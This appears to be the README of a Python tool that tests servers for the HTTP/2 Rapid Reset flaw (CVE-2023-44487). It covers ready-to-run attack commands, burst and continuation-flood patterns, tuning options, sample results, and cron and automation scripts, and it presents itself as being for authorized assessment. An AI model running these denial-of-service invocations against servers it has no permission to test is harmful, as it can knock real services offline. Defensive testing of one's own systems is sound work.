
Python-based testing tool for CVE-2023-44487 (HTTP/2 Rapid Reset) with multiple attack patterns, granular configuration, and monitoring for authorized security assessments.
A comprehensive Python testing tool for CVE-2023-44487, the HTTP/2 Rapid Reset vulnerability. This enhanced version provides granular control over testing parameters, multiple attack patterns, and advanced monitoring capabilities.
This tool is for educational and authorized testing purposes ONLY!
CVE-2023-44487, also known as "HTTP/2 Rapid Reset," is a critical vulnerability in the HTTP/2 protocol that allows attackers to:
CVSS Score: 7.5 (High)
Impact: Denial of Service, Resource Exhaustion
git clone https://github.com/madhusudhan-in/CVE_2023_44487-Rapid_Reset.git
cd CVE_2023_44487-Rapid_Reset
chmod +x rapid_reset_test.py
python3 --version # Should be 3.7+
python3 rapid_reset_test.py https://target-server.com
python3 rapid_reset_test.py https://target.com \
--connections 50 \
--requests 1000 \
--delay 0 \
--pattern rapid_reset \
--track-latency \
--output json
python3 rapid_reset_test.py https://target.com \
--pattern burst_reset \
--burst-size 5 \
--burst-delay 2.0 \
--custom-headers "User-Agent: Mozilla/5.0 (legitbot)" "Authorization: Bearer token123" \
--jitter 0.3
python3 rapid_reset_test.py https://target.com \
--window-size 32768 \
--frame-size 32768 \
--header-table-size 8192 \
--enable-push \
--priority-frames \
--randomize-streams
python3 rapid_reset_test.py https://target.com \
--connections 10 \
--requests 200 \
--pattern mixed_pattern \
--track-latency \
--track-responses \
--monitor-memory \
--verbose \
--debug \
--log-file attack.log
python3 rapid_reset_test.py https://target.com \
--pattern continuation_flood \
--requests 50 \
--random-headers \
--header-count 20
| Option | Description | Default |
|---|---|---|
-c, --connections N | Number of concurrent connections | 1 |
--connection-timeout SEC | Connection timeout in seconds | 10 |
--read-timeout SEC | Read timeout for responses | 5 |
--connection-delay SEC | Delay between connections | 0.0 |
| Option | Description | Default |
|---|---|---|
-r, --requests N | Requests per connection | 100 |
--delay SEC | Delay between HEADERS and RST_STREAM | 0.001 |
--request-delay SEC | Delay between requests | 0.0 |
--jitter FACTOR | Timing randomization factor | 0.0 |
| Option | Description | Default |
|---|---|---|
--pattern TYPE | Attack pattern to use | rapid_reset |
--burst-size N | Requests per burst | 10 |
--burst-delay SEC | Delay between bursts | 0.1 |
Available Patterns:
rapid_reset - Standard rapid reset attackburst_reset - Burst-based attacksgradual_reset - Gradually increasing raterandom_reset - Random timingcontinuation_flood - CONTINUATION frame floodmixed_pattern - Mix of patterns| Option | Description | Default |
|---|---|---|
--window-size BYTES | HTTP/2 initial window size | 65535 |
--frame-size BYTES | Maximum frame size | 16384 |
--header-table-size BYTES | HPACK header table size | 4096 |
--enable-push | Enable HTTP/2 server push | False |
--rst-error-code CODE | RST_STREAM error code | 8 |
| Option | Description | Default |
|---|---|---|
--custom-headers HEADER | Custom headers (Name: Value) | None |
--random-headers | Generate random headers | False |
--header-count N | Number of random headers | 5 |
| Option | Description | Default |
|---|---|---|
--randomize-streams | Use random stream IDs | False |
--priority-frames | Include priority information | False |
--continue-on-error | Continue after errors | True |
--max-errors N | Maximum errors before stopping | 10 |
| Option | Description | Default |
|---|---|---|
--track-latency | Track request latency | False |
--track-responses | Track server responses | False |
--monitor-memory | Monitor memory usage | False |
| Option | Description | Default |
|---|---|---|
--output FORMAT | Output format | console |
--output-file FILE | Output filename | auto-generated |
--verbose, -v | Verbose output | False |
--debug | Debug logging | False |
--log-file FILE | Log to file | None |
Available Output Formats:
console - Human-readable console outputjson - Machine-readable JSONcsv - Spreadsheet-compatible CSVxml - Structured XML formatThe tool provides comprehensive results including:
{
"target_url": "https://example.com",
"test_config": {
"attack_pattern": "rapid_reset",
"max_connections": 10,
"requests_per_connection": 100,
"delay_between_headers_rst": 0.001
},
"test_summary": {
"duration": 2.34,
"successful_connections": 10,
"total_successful_attacks": 950,
"success_rate": 95.0,
"requests_per_second": 405.98,
"total_bytes_sent": 125600,
"average_latency": 0.0024
},
"connection_stats": [...],
"errors": [...],
"timestamp": 1640995200.0
}
The tool automatically assesses vulnerability:
If your server is found vulnerable, implement these mitigations:
import subprocess
import json
# Run automated test
result = subprocess.run([
'python3', 'rapid_reset_test.py',
'https://target.com',
'--pattern', 'mixed_pattern',
'--output', 'json',
'--output-file', 'results.json'
])
# Analyze results
with open('results.json') as f:
data = json.load(f)
vulnerability_score = data['test_summary']['success_rate']
if vulnerability_score > 80:
print(f"HIGH RISK: {vulnerability_score}% success rate")
#!/bin/bash
# Cron job: 0 2 * * * /path/to/monitor.sh
python3 rapid_reset_test.py https://myserver.com \
--pattern rapid_reset \
--connections 5 \
--requests 50 \
--output json \
--output-file /var/log/rapid-reset-$(date +%Y%m%d).json
# Alert if vulnerability detected
if [ $(jq '.test_summary.success_rate' /var/log/rapid-reset-$(date +%Y%m%d).json) -gt 80 ]; then
echo "ALERT: Server vulnerable to rapid reset attack" | mail -s "Security Alert" [email protected]
fi
import pandas as pd
import matplotlib.pyplot as plt
# Load and analyze CSV results
df = pd.read_csv('results.csv')
# Visualize attack success by connection
plt.figure(figsize=(12, 6))
plt.subplot(1, 2, 1)
df.plot(x='connection_id', y='successful_attacks', kind='bar')
plt.title('Attack Success by Connection')
plt.subplot(1, 2, 2)
df['success_rate'] = (df['successful_attacks'] / df['total_attacks']) * 100
plt.hist(df['success_rate'], bins=20)
plt.title('Success Rate Distribution')
plt.show()
Connection refused:
SSL/TLS errors:
--debug for detailed SSL informationLow success rates:
Performance issues:
--debug and --log-file for analysis--verbose --debug --log-file debug.log--connections 1 --requests 10--track-responses--track-latencyThis tool is provided under the MIT License. See LICENSE file for details.
This tool is intended for cybersecurity professionals, researchers, and system administrators to test their own systems or systems they have explicit permission to test. The authors are not responsible for any misuse of this tool.
Key Legal Points:
Remember: With great power comes great responsibility. Use this tool ethically and legally.
The enhanced version maintains backward compatibility with the basic version. All existing command-line options continue to work, with new options providing additional capabilities.
For users upgrading from the basic version:
# Old basic usage still works
python3 rapid_reset_test.py https://example.com --connections 5 --requests 100
# New enhanced usage with additional options
python3 rapid_reset_test.py https://example.com \
--connections 5 --requests 100 \
--pattern burst_reset --track-latency --output json